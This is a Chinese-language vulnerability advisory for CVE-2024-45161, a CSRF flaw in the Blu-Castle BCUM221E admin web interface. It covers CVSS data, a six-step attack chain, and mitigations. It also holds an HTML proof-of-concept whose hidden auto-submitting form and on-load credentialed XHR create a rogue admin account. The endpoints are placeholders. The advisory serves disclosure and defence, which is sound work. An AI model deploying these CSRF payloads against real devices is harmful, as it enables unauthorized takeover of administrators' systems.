CVE-2024-45161 Blu-Castle BCUM221E 跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2024-45161

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Blu-Castle BCUM221E 1.0.0P220507

漏洞概述

CVE-2024-45161是Blu-Castle公司开发的BCUM221E设备1.0.0P220507版本中存在的一个跨站请求伪造（CSRF）漏洞。该漏洞位于设备的管理Web图形用户界面（GUI）中，攻击者可以通过多种方式诱导已登录的管理员用户执行未经授权的操作。攻击向量包括构造恶意URL、嵌入恶意图片标签或使用XMLHttpRequest等技术。由于CSRF攻击利用了Web应用程序对用户浏览器的信任，攻击者可以在用户不知情的情况下，以该用户的权限执行敏感操作，最终导致数据泄露或意外的代码执行。此漏洞需要用户交互才能成功利用，攻击者必须诱骗管理员访问恶意链接或页面。由于该设备通常用于关键基础设施或企业网络环境，此类CSRF漏洞可能对系统的整体安全性造成严重影响。

技术细节

该CSRF漏洞存在于Blu-Castle BCUM221E设备的管理Web GUI中，攻击者可利用HTTP请求的固有特性来执行恶意操作。攻击原理如下：1）攻击者首先构造包含恶意请求参数的HTML页面或链接；2）当已登录的管理员用户访问该页面或点击链接时，浏览器会自动携带有效的会话Cookie向目标设备发送请求；3）由于Web应用缺少对请求来源的验证（未实施CSRF Token或Referer检查），服务器无法区分合法请求和伪造请求；4）攻击者可借此执行设备配置修改、账户操作或其他管理功能。攻击方式包括：URL构造（直接在URL中包含恶意参数）、图片标签注入（<img src="http://target/admin/action?param=value">）、XMLHttpRequest请求等。由于设备采用低权限认证机制（PR:L），攻击者需要诱骗管理员用户进行交互（UI:R），但一旦成功即可在管理员权限下执行操作，可能导致敏感数据泄露或进一步攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先收集目标Blu-Castle BCUM221E设备的信息，包括IP地址、管理界面URL和已知的会话Cookie特征

STEP 2

步骤2: 构造恶意页面

攻击者创建一个包含恶意请求的HTML页面，使用img标签、form表单或XMLHttpRequest来构造针对管理界面的CSRF请求

STEP 3

步骤3: 社会工程攻击

通过钓鱼邮件、恶意链接或其他社会工程手段诱导已登录的管理员用户访问攻击者构造的恶意页面

STEP 4

步骤4: 请求自动发送

当管理员浏览器加载恶意页面时，会自动携带有效的会话Cookie向目标设备发送伪造的HTTP请求

STEP 5

步骤5: 漏洞利用

设备Web应用因缺少CSRF Token验证而接受请求，攻击者可以在管理员权限下执行配置修改、账户创建等敏感操作

STEP 6

步骤6: 数据泄露或持久化控制

攻击者可获取敏感配置信息、修改系统参数或创建后门账户，实现数据泄露或长期控制目标设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2024-45161 - Blu-Castle BCUM221E -->
<!-- This PoC demonstrates CSRF attack on administrative web GUI -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - CVE-2024-45161</title>
</head>
<body>
    <h1>CSRF Attack PoC for Blu-Castle BCUM221E</h1>
    
    <!-- Method 1: Auto-submit form (Image load technique) -->
    <h2>Image-based CSRF Trigger</h2>
    <img src="http://<target-ip>/admin/settings?action=modify&param=value" 
         style="display:none" 
         onerror="document.getElementById('status').innerHTML='CSRF Request Sent'">
    
    <!-- Method 2: XMLHttpRequest -->
    <h2>XMLHttpRequest-based CSRF</h2>
    <script>
        function performCSRF() {
            var xhr = new XMLHttpRequest();
            xhr.open('POST', 'http://<target-ip>/admin/api/endpoint', true);
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            xhr.withCredentials = true;
            xhr.send('action=execute&command=malicious_command');
            xhr.onload = function() {
                console.log('CSRF Request completed');
            };
        }
        // Auto-trigger on page load
        window.onload = performCSRF;
    </script>
    
    <!-- Method 3: Auto-submit form -->
    <h2>Form Auto-submit CSRF</h2>
    <form id="csrfForm" action="http://<target-ip>/admin/settings" method="POST" style="display:none">
        <input type="hidden" name="username" value="newadmin">
        <input type="hidden" name="password" value="attacker123">
        <input type="hidden" name="privilege" value="admin">
    </form>
    <script>document.getElementById('csrfForm').submit();</script>
    
    <p id="status">Waiting for CSRF request...</p>
</body>
</html>

影响范围

Blu-Castle BCUM221E 1.0.0P220507

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用管理Web GUI的外部访问，仅允许通过内网VPN或专用管理网络访问；2）使用浏览器安全插件阻止跨站请求；3）管理员在操作完成后及时注销会话，避免长时间保持登录状态；4）监控网络流量，检测异常的CSRF请求模式；5）定期检查设备配置和账户列表，及时发现未授权的变更。建议管理员避免点击来自不可信来源的链接，特别是那些声称来自设备厂商或包含设备IP地址的链接。